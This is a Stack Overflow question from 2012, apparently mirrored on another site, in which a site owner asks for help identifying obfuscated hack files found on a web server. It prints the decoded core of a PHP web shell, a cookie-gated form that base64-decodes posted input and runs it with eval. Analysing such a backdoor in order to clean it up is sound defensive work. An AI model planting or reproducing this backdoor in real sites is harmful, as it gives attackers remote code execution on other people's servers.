PHP hack files found - help decoding and identifying
Posted
by
akc
on Stack Overflow
See other posts from Stack Overflow
or by akc
Published on 2012-04-09T05:26:02Z
Indexed on
2012/04/09
5:29 UTC
Read the original article
Hit count: 228
I found a handful of hack files on our web server. I managed to de-obfuscate them a bit -- they all seem to have a part that decodes into a chunk that looks like:
if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){if (!empty($_POST['c'])) {echo '<textarea rows=28 cols=80>'; $d=base64_decode(str_replace(' ','+',$_POST['c']));if($d) @eval($d); echo '</textarea>';}echo '<form action="" method=post><textarea cols=80 rows=28 name=c></textarea><br><input type=submit></form>';exit;}
But this chunk (decoded above) is usually embedded into a larger code snippet. I've shared the code of one of the files in its entirety here: http://pastie.org/3753704
I can sort of see where this code is going, but definitely not an expert at PHP and could use some help figuring out more specifically what it's doing or enabling. Also, if anyone happens to be familiar with this hack, any information on how it works, and where the backdoor and other components of the hack may be hidden would be super helpful and greatly appreciated.
I tried to Google parts of the code, to see if others have reported it, but only came up with this link: http://www.daniweb.com/web-development/php/threads/365059/hacked-joomla
Thanks!
© Stack Overflow or respective owner